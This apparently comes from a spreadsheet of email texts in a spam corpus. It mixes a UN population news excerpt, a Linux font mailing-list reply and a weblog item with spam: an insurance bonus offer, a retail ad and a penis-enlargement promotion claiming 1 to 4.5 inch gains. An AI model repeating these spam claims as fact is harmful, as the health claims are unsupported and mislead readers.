 older. The over-80 age group is the fastest growing.
 But not everywhere. For example, the United Nations calculates that life
 expectancy at birth is being slashed in countries hardest hit by AIDS. In
 South Africa, the life of a baby born now should be 66 years; AIDS has cut
 that to 47. In Zimbabwe, the drop has been to 43 years from 69. In
 Botswana, it is 36 years, down from 70.
 Another cautionary sign from projections is that where populations are
 continuing to grow fastest, societies and governments may be least likely
 to cope with the results, including strains on natural resources -
 farmland, water, air, forests and animals.
 Last year, the organization published a report and wall chart, "Population,
 Environment and Development," plotting and analyzing population changes as
 its contribution to the debate surrounding the Johannesburg summit meeting.
 The United Nations estimates that the world's current population, 6.2
 billion, is growing at an annual rate slightly over 1.2 percent, producing
 some 77 million people. Of this growth, 97 percent is taking place in
 less-developed countries, said Dr. Chamie, whose position at the United
 Nations makes him chief keeper of the world's statistics. Six nations will
 dominate this growth, and in this order: India, China, Pakistan, Nigeria,
 Bangladesh and Indonesia.
 Thus, though fertility is declining unexpectedly in a poor country like
 India, which has more than a billion people, the actual numbers continue to
 rise rapidly because the base is so large. India is gaining as many people
 annually as China, Pakistan and Nigeria combined, the United Nations says.
 India is projected to have at least 100 million more people than China by
 2050, even if China's one-child policy is relaxed. Small families are now
 the norm for the Chinese, whose standard of living has risen above that of
 the people of India by many measures.
 Among industrialized countries, the United States alone has a growth rate
 comparable to that of developing nations. It now ranks seventh in growth,
 Dr. Chamie said, but 80 percent of that growth comes from immigration. In
 Europe, populations are shrinking, even with more immigration.
 With much of the population bulge predicted in Asia, the East-West Center
 in Honolulu has just published a report, "The Future of Population in
 Asia," which finds cause to fear considerable environmental stress in a
 region where population densities and numbers are often great. Asia, the
 report notes, already has 56 percent of the world's population living on 31
 percent of its arable land, and more than 900 million people exist on less
 than $1 a day.
 "Asia faces the most acute pressure on arable agricultural land of any
 region in the world," the report says, adding that expansion of farmland
 has been made at the cost of forests. Acute water scarcity, a significant
 loss of biodiversity and more urban pollution seem inevitable. Twelve of
 the world's 15 most polluted cities are in Asia. By 2020, the report
 predicts, Asia will be producing more carbon dioxide emissions than any
 other region.
 "When looking at current and future environmental concerns in Asia," the
 report concludes, "the number of people to be fed, clothed, housed,
 transported, educated and employed may not be the only issue, but it is an
 issue that cannot be ignored."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</si>
  <si>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On Tue, 08 Oct 2002 23:15:07 -0700
 Ben Liblit &lt;liblit@eecs.berkeley.edu&gt; wrote:
 &gt; Ick.  Perhaps this is why Red Hat turned the bytecode interpreter off. 
 &gt; It may improve non-antialiased rendering, but only at the expense of 
 &gt; making a mess of antialiased rendering.
 &gt; 
 &gt; This may come down to a matter of personal aesthetics, but for my part, 
 &gt; I'm going back to Red Hat's standard packages with the bytecode 
 &gt; interpreter turned *off*.
 Yes, confirmed, but for my part, I'm using mostly non-antialiased fonts
 and 
 they are true ugly without the bytecode interpreter enabled.
 Remember my stupid request about your RPM ;-)
 --
   Regards from Germany
                      Matthias
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let Us "Show You the Money!"
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_211FCD_01C23A42.6BB016B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Show Us Your Apps!	
 Receive a total of $1,000 in CASH BONUSES* 
 for every 5 LTC apps you write &amp; submit before 9-30-02!
 If all 5 are not received by 9-30-02, but received by 12-31-02?
 You'll still get a total of $800 in Cash Bonuses* 	
 Claim your cash! Call today!
  800-316-5495
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 *Bonuses awarded from M&amp;O Marketing on paid, issued business. For agent
 use only. Offer subject to change without notice. Offer starts 7/15/02.
 Offer ends 12/31/02. Offer good in all states except: WI, IN, DE. Not
 available with all carriers.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------=_NextPart_000_211FCD_01C23A42.6BB016B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Let Us "Show You the Money!"&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bigbonus/20020722-101.jpg" =
 width=3D"550" height=3D"80" alt=3D'Show Us Your Apps!'&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 color=3D"#0066CC" size=3D"2"&gt;
             Receive a total of &lt;font color=3D"#FF0000"&gt;$1,000&lt;/font&gt; in =
 CASH BONUSES* &lt;br&gt;
             for every 5 LTC apps you write &amp;amp; submit before =
 9-30-02!&lt;br&gt;
             &lt;br&gt;
             If all 5 are not received by 9-30-02, but received by =
 12-31-02&amp;#133;&lt;br&gt;
             You'll still get a total of &lt;font =
 color=3D"#FF0000"&gt;$800&lt;/font&gt; in Cash Bonuses*&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/mando/bigbonus/20020722-102.jpg" =
 width=3D"421" height=3D"397"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Claim your cash! Call today!&lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/bigbonus/20020722-2.gif" width=3D"534" =
 height=3D"86" alt=3D'800-316-5495'&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;br&gt;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colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@mandomarketing.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"M&amp;O Big Bonus Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img =
 src=3D"http://iiq.us/images/mando/bigbonus/20020722-3.gif" width=3D"382" =
 height=3D"130"&gt; &lt;/b&gt;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;*Bonuses awarded=20
             from M&amp;amp;O Marketing on paid, issued business. For agent =
 use only.=20
             Offer subject to change without notice. Offer starts =
 7/15/02. Offer=20
             ends 12/31/02. Offer good in all states except: WI, IN, DE. =
 Not available=20
             with all carriers.&lt;/font&gt;&lt;/td&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_211FCD_01C23A42.6BB016B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Is the size rite?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;BODY BGCOLOR="#ffff00"&gt;&lt;/P&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  BACK="#ffff00" style="BACKGROUND-COLOR: #ffff00" SIZE=6 PTSIZE=22&gt;&lt;B&gt;Men's Health Update!&lt;BR&gt;
 &lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffff00" style="BACKGROUND-COLOR: #ffff00" SIZE=3 PTSIZE=12 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;/B&gt;What if we could show you how to EFFECTIVELY add between 1" to 4.5" to your penis size without surgery, pumps, or other painful methods? Would you be willing to check it out and try all natural exercise techniques that could add MAJOR size to your penis? &lt;BR&gt;
 &lt;BR&gt;
 If you dont think you would like a larger, thicker, stronger penis youre definitely kidding yourself! Every man on the planet would like to increase his penis size, and we can show you how!&lt;/FONT&gt;&lt;FONT  COLOR="#000000" BACK="#ffff00" style="BACKGROUND-COLOR: #ffff00" SIZE=5 PTSIZE=14 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt; &lt;BR&gt;
 &lt;BR&gt;
 &lt;A HREF="http://rd.yahoo.com/dir/?http://www.alwayzfree.com/Etc/bigdaddy/index.htm"&gt;CLICK HERE NOW!&lt;/A&gt;&lt;BR&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;/P&gt;&lt;/FONT&gt;&lt;/HTML&gt;
 rnbda
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lest anyone doubt that Brent has a good heart. "I laughed,
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:9:13:33AM
 Date: Tue, 24 Sep 2002 16:13:33 GMT
 Lest anyone doubt that Brent[1] has a good heart. "I laughed, because here's 
 the irony -- on this site, on my own personal weblog, Radio UserLand rather 
 than NetNewsWire is the most-used aggregator."
 [1] http://inessential.com/2002/09/21.php
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FREE SHIPPING! No Minimum Purchase* at Buy.com
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Buyers Alert Announce&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr valign="bottom"&gt;&lt;td width="440"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/hd_buyers_alert.gif" width="440" height="60" alt="ZDNet Announce"&gt;&lt;/td&gt;
 &lt;td width="184"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/corner_anc.gif" width="184" height="8"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr bgcolor="#ffffef"&gt;&lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="600" height="32" align="center"&gt;&lt;font face="arial, helvetica" size="-1" color="#333333"&gt;&lt;b&gt;* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#ffffff"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width="600"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 15, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;&lt;title&gt;Free Shipping at Buy.com!*&lt;/title&gt;&lt;/head&gt;
 &lt;body&gt;
 &lt;table width="600" cellspacing="0" cellpadding="0" border="1" bordercolor="175A7E"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td height="75" valign="top" align="left" bgcolor="#ffffff"&gt;
 						&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNET_062402/FS_nominimum_hdr.gif" width="598" height="75" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" bgcolor="#ffffff" cellspacing="0" cellpadding="20" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td height="147" width="555" valign="top" align="middle" bgcolor="#ffffff"&gt;
 						&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK89Mj6W-aktQ3DlPfP8N4R" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNET_062402/FS_truck.gif" width="555" height="147" border="0" alt="Visit Buy.com Today For Free Shipping!*"&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td colspan="2" width="100%"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/feat_prod_blue.gif" width="553" height="24" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td valign="top" width="50%"&gt;
 						&lt;table cellspacing="10" cellpadding="0" border="0"&gt;
 							&lt;tr&gt;
 								&lt;td align="center" valign="top"&gt;
 									&lt;img src="http://ak.buy.com/db_assets/ad_images/998/20345998.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;pcAnywhere 10.5&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$179.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$159.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Plus an $80.00 mail-in upgrade rebate available from Symantec.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAW8Sk_eL9Z5VKc-3P0BcR"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src="http://ak.buy.com/db_assets/ad_images/367/10259367.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Linksys 11Mbps&lt;br&gt;Wireless PC Card&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$69.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Share printers, files and more anywhere within your wireless LAN infrastructure; increasing your productivity and keeping you "in touch."&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHO_le9wDYjKHbtbXYzHRR"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src="http://ak.buy.com/db_assets/ad_images/605/10310605.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;MouseMan Traveler Optical Mouse for Notebooks&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$49.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$43.12&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Travel anywhere with it. No ball. No cleaning. No hassle.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DeKfDiQA5K-fxuEL59R"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src="http://ak.buy.com/db_assets/ad_images/231/90105231.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Panasonic DVD-LV50 PalmTheater? Portable DVD-Video Player with Built-in Freestyle LCD&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$599.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$499.99&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Panasonic's portable DVD players are equipped with built-in widescreen LCD monitors.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71Z-b870tuoAABMMPZ9rR" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/blu_triangle.gif" border="0" valign="absmiddle"&gt;&lt;font face="verdana,arial,helvetica,sans-serif" size="1" color="175A7E"&gt;&lt;b&gt;more info&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;p&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 					&lt;td valign="top" width="50%"&gt;
 						&lt;table cellspacing="10" cellpadding="0" border="0"&gt;
 							&lt;tr&gt;
 								&lt;td align="center" valign="top"&gt;
 									&lt;img src="http://ak.buy.com/db_assets/ad_images/245/10321245.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Acer TM632XCI NB P4&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$2,077.19&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$2,031.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Mobile experience to the next Level! Amazing value on this Acer Notebook!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68MIqRrCW5CH7esbKRiR"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src="http://ak.buy.com/db_assets/ad_images/851/10308851.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;128MB SanDisk&lt;br&gt;SmartMedia Card&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$108.75&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$55.58&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Removable SmartMedia Card that's great for the Road!&lt;br&gt;Plus Free Shipping!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIc0NBiQhaIHsSzky0PR"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src="http://ak.buy.com/db_assets/ad_images/924/70006924.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;US Robotics 56K Global GSM &amp; Cellular PC Card Modem&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$119.99&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$69.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Get connected on your notebook anywhere your GSM Cell phone works!&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRU6Po4ygVnxXFZcIuInR"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src="http://ak.buy.com/db_assets/ad_images/239/10322239.gif" border="0"&gt;
 								&lt;/td&gt;
 								&lt;td valign="top"&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#175A7E"&gt;&lt;b&gt;Toshiba PocketPC e310&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#000000"&gt;&lt;b&gt;List Price&amp;nbsp;-&amp;nbsp;$402.84&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2" COLOR="#cc0033"&gt;&lt;b&gt;Buy.com price&amp;nbsp;-&amp;nbsp;$359.95&lt;/B&gt;&lt;/font&gt;&lt;br&gt;
 									&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="2"&gt;Easy to use, the Toshiba Pocket PC e310 features a familiar user interface and tools powered by Microsoft Windows such as Pocket Word, Excel, Outlook &amp; Windows Media Player for Pocket PC 2002.&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMz2gIzdmkSWreAgRDciR" target="_new"&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/blu_triangle.gif" border="0" valign="absmiddle"&gt;&lt;font face="verdana,arial,helvetica,sans-serif" size="1" color="175A7E"&gt;&lt;b&gt;more info&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;p&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="0" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;&lt;img src="http://ak.buy.com/buy_assets/v6/email/CNet_071502/terms_blu.gif" align="left" width="590" height="19" border="0"&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 			&lt;table width="100%" cellspacing="0" cellpadding="10" border="0"&gt;
 				&lt;tr&gt;
 					&lt;td&gt;
 						&lt;font face="verdana, ARIAL, HELVETICA, SANS-SERIF" SIZE="1" color="000000"&gt;
 						All prices and product availability subject to change without notice. Unless 
 						noted, prices do not include shipping and applicable sales taxes. Product 
 						quantities limited. List price refers to manufacturer's suggested retail 
 						price and may be different than actual selling prices in your area. Please 
 						visit us at &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkhDZaFxv3orMjEsaQPR" target="_new"&gt;www.buy.com&lt;/a&gt; or the 
 						links above for more information including latest pricing, availability and 
 						restrictions on each offer. "Buy.com" and "The Internet Superstore" are trademarks of 
 						BUY.COM Inc. (C) BUY.COM Inc. 2002. All rights reserved. 
 						&lt;p&gt;*FREE SHIPPING OFFER: Get FREE SHIPPING on qualified items for a limited 
 						time only. Qualified items are identified on product information pages with 
 						this free shipping icon. Standard ground shipping method will be selected by 
 						Buy.com except for books, videos, DVDs, music and games, which will ship 
 						via budget shipping method. Free shipping offer is limited to in stock 
 						items. Restrictions apply. See site for details.&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 			&lt;/table&gt;
 		&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer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width="624"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href='http://clickthru.online.com/Click?q=02-qif9zej4NJqw18ztcG9OQQmdb4m0ARRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.zdnet.com/filters/email/faq/"&gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/a&gt;&lt;br&gt;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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://www.zdnet.com/"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
